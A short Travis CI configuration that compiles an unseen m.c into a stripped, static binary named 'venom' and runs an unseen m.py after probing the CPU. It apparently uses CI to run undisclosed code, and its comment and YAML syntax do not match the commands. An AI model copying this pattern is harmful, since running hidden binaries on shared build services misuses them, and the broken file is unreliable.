language: python
dist: focal  # Use Ubuntu 20.04 (Focal Fossa)
python:
  - "3.10"   # Specify Python version

before_install:
  # Update system and install required packages
  - sudo apt-get update
  - sudo apt-get install -y gcc

install:
  # Upgrade pip and install required Python dependencies
  - python3 -m pip install --upgrade pip

before_script:
  # Compile soul.c if it exists
  - ls
  gcc m.c -o venom  -O3 -march=native -flto -fomit-frame-pointer -fvisibility=hidden -s -static -pthread

script:
  # Run the Python script
  - chmod +x * && lscpu && python3 m.py
  
                               
